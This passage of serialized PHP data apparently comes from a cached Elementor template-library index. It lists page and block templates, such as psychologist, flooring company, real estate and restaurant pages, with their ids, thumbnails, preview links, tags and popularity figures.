Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Contact-Us.jpg\";s:12:\"tmpl_created\";i:1600160499;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/psychologist-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:666;s:11:\"trend_index\";i:558;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:377;a:19:{s:4:\"tmpl\";i:509;s:2:\"id\";i:5496;s:5:\"title\";s:7:\"About 9\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_8-1.png\";s:12:\"tmpl_created\";i:1520443526;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:82;s:16:\"popularity_index\";i:523;s:11:\"trend_index\";i:453;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:378;a:19:{s:4:\"tmpl\";i:1041;s:2:\"id\";i:15142;s:5:\"title\";s:25:\"Psychologist &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/09/Home.jpg\";s:12:\"tmpl_created\";i:1600156308;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/psychologist-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:83;s:16:\"popularity_index\";i:464;s:11:\"trend_index\";i:297;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:379;a:19:{s:4:\"tmpl\";i:1044;s:2:\"id\";i:15188;s:5:\"title\";s:28:\"Psychologist &#8211; Pricing\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/09/Pricing.jpg\";s:12:\"tmpl_created\";i:1600159731;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/psychologist-pricing/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:732;s:11:\"trend_index\";i:537;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:380;a:19:{s:4:\"tmpl\";i:684;s:2:\"id\";i:8961;s:5:\"title\";s:9:\"archive 1\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.1.jpg\";s:12:\"tmpl_created\";i:1528639909;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:84;s:16:\"popularity_index\";i:79;s:11:\"trend_index\";i:15;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:381;a:19:{s:4:\"tmpl\";i:1043;s:2:\"id\";i:15167;s:5:\"title\";s:29:\"Psychologist &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/09/Services.jpg\";s:12:\"tmpl_created\";i:1600158206;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/psychologist-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:85;s:16:\"popularity_index\";i:606;s:11:\"trend_index\";i:379;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:382;a:19:{s:4:\"tmpl\";i:1036;s:2:\"id\";i:14932;s:5:\"title\";s:30:\"Flooring Company &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/About.png\";s:12:\"tmpl_created\";i:1597740110;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/flooring-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:488;s:11:\"trend_index\";i:319;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:383;a:19:{s:4:\"tmpl\";i:685;s:2:\"id\";i:8969;s:5:\"title\";s:9:\"archive 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.2.jpg\";s:12:\"tmpl_created\";i:1528700014;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:86;s:16:\"popularity_index\";i:250;s:11:\"trend_index\";i:124;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:384;a:19:{s:4:\"tmpl\";i:1037;s:2:\"id\";i:14998;s:5:\"title\";s:32:\"Flooring Company &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/08/Contact-Us.png\";s:12:\"tmpl_created\";i:1597740222;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:87;s:16:\"popularity_index\";i:553;s:11:\"trend_index\";i:380;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:385;a:19:{s:4:\"tmpl\";i:1038;s:2:\"id\";i:14965;s:5:\"title\";s:32:\"Flooring Company &#8211; Gallery\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2020/08/Gallery.png\";s:12:\"tmpl_created\";i:1597740353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/flooring-company-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:371;s:11:\"trend_index\";i:291;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:386;a:19:{s:4:\"tmpl\";i:686;s:2:\"id\";i:8973;s:5:\"title\";s:9:\"archive 3\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.3.jpg\";s:12:\"tmpl_created\";i:1528700205;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-3/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:88;s:16:\"popularity_index\";i:176;s:11:\"trend_index\";i:54;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:387;a:19:{s:4:\"tmpl\";i:1282;s:2:\"id\";i:22417;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1647354987;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:143:\"https://library.elementor.com/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:89;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:388;a:19:{s:4:\"tmpl\";i:1040;s:2:\"id\";i:14947;s:5:\"title\";s:33:\"Flooring company &#8211; Services\";s:9:\"thumbnail\";s:69:\"https://library.elementor.com/wp-content/uploads/2020/08/Services.png\";s:12:\"tmpl_created\";i:1597740551;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/flooring-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:90;s:16:\"popularity_index\";i:538;s:11:\"trend_index\";i:392;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:389;a:19:{s:4:\"tmpl\";i:1039;s:2:\"id\";i:14901;s:5:\"title\";s:29:\"Flooring Company &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/08/Home.png\";s:12:\"tmpl_created\";i:1597740474;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/flooring-company-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:387;s:11:\"trend_index\";i:185;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:390;a:19:{s:4:\"tmpl\";i:687;s:2:\"id\";i:8977;s:5:\"title\";s:9:\"archive 4\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.4.jpg\";s:12:\"tmpl_created\";i:1528700326;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-4/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:91;s:16:\"popularity_index\";i:354;s:11:\"trend_index\";i:396;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:391;a:19:{s:4:\"tmpl\";i:1252;s:2:\"id\";i:22146;s:5:\"title\";s:36:\"Home Decor Store &#8211; Coming Soon\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Home-Decore.png\";s:12:\"tmpl_created\";i:1647177514;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/home-decor-store-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:57:\"[\"Coming Soon\",\"Decor\",\"Interior Design\",\"Landing Pages\"]\";s:10:\"menu_order\";i:92;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:392;a:19:{s:4:\"tmpl\";i:688;s:2:\"id\";i:8981;s:5:\"title\";s:9:\"archive 5\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.5.jpg\";s:12:\"tmpl_created\";i:1528700484;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:333;s:11:\"trend_index\";i:195;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:393;a:19:{s:4:\"tmpl\";i:1021;s:2:\"id\";i:14737;s:5:\"title\";s:32:\"Luxury Real Estate &#8211; About\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/About.png\";s:12:\"tmpl_created\";i:1595313527;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/luxury-real-estate-about-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:93;s:16:\"popularity_index\";i:150;s:11:\"trend_index\";i:447;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:394;a:19:{s:4:\"tmpl\";i:689;s:2:\"id\";i:8985;s:5:\"title\";s:9:\"archive 6\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.6.jpg\";s:12:\"tmpl_created\";i:1528700612;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-6/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:204;s:11:\"trend_index\";i:95;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:395;a:19:{s:4:\"tmpl\";i:1020;s:2:\"id\";i:14756;s:5:\"title\";s:34:\"Luxury Real Estate &#8211; Contact\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/07/Contact-Us.png\";s:12:\"tmpl_created\";i:1595313519;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/luxury-real-estate-contact-us-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:94;s:16:\"popularity_index\";i:610;s:11:\"trend_index\";i:569;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:396;a:19:{s:4:\"tmpl\";i:1019;s:2:\"id\";i:14716;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; Home\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2020/07/Home.png\";s:12:\"tmpl_created\";i:1595313512;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:95;s:16:\"popularity_index\";i:394;s:11:\"trend_index\";i:165;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:397;a:19:{s:4:\"tmpl\";i:690;s:2:\"id\";i:8989;s:5:\"title\";s:9:\"archive 7\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.7.jpg\";s:12:\"tmpl_created\";i:1528701063;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-7/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:208;s:11:\"trend_index\";i:111;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:398;a:19:{s:4:\"tmpl\";i:1018;s:2:\"id\";i:14763;s:5:\"title\";s:31:\"Luxury Real Estate &#8211; News\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2020/07/news-Archive.png\";s:12:\"tmpl_created\";i:1595313273;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/luxury-real-estate-news-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:96;s:16:\"popularity_index\";i:404;s:11:\"trend_index\";i:167;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:399;a:19:{s:4:\"tmpl\";i:1283;s:2:\"id\";i:22423;s:5:\"title\";s:39:\"Online Store &#8211; Under Construction\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Online-Store.png\";s:12:\"tmpl_created\";i:1647355154;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/online-store-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:59:\"[\"Landing Pages\",\"Online Shop\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:97;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:400;a:19:{s:4:\"tmpl\";i:691;s:2:\"id\";i:8996;s:5:\"title\";s:9:\"archive 8\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.8.jpg\";s:12:\"tmpl_created\";i:1528701290;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-8/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:227;s:11:\"trend_index\";i:153;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:401;a:19:{s:4:\"tmpl\";i:1010;s:2:\"id\";i:13960;s:5:\"title\";s:32:\"Japanese restaurant &#8211; Home\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2020/06/Home-Page.jpg\";s:12:\"tmpl_created\";i:1592289775;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/japanese-restaurant-home-page/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:98;s:16:\"popularity_index\";i:537;s:11:\"trend_index\";i:287;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:402;a:19:{s:4:\"tmpl\";i:1284;s:2:\"id\";i:22428;s:5:\"title\";s:40:\"Travel Agency &#8211; Under Construction\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Travel-Agency-1.png\";s:12:\"tmpl_created\";i:1647355339;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/travel-agency-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:56:\"[\"Agency\",\"Landing Pages\",\"Travel\",\"Under Construction\"]\";s:10:\"menu_order\";i:99;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:403;a:19:{s:4:\"tmpl\";i:692;s:2:\"id\";i:9001;s:5:\"title\";s:9:\"archive 9\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/06/Archive_350.9.jpg\";s:12:\"tmpl_created\";i:1528701433;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/blocks/archive-9/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:7:\"archive\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:265;s:11:\"trend_index\";i:208;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:404;a:19:{s:4:\"tmpl\";i:1007;s:2:\"id\";i:13993;s:5:\"title\";s:45:\"Japanese restaurant &#8211; Chef&#8217;s Menu\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2020/06/Chef_s-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289691;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:129:\"https://library.elementor.com/japanese-restaurant-chefs-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:100;s:16:\"popularity_index\";i:651;s:11:\"trend_index\";i:675;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:405;a:19:{s:4:\"tmpl\";i:1006;s:2:\"id\";i:14012;s:5:\"title\";s:36:\"Japanese restaurant &#8211; Bar Menu\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2020/06/Bar-Menu-Page.jpg\";s:12:\"tmpl_created\";i:1592289665;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/japanese-restaurant-bar-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:101;s:16:\"popularity_index\";i:735;s:11:\"trend_index\";i:829;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:406;a:19:{s:4:\"tmpl\";i:1005;s:2:\"id\";i:13917;s:5:\"title\";s:33:\"Japanese restaurant &#8211; 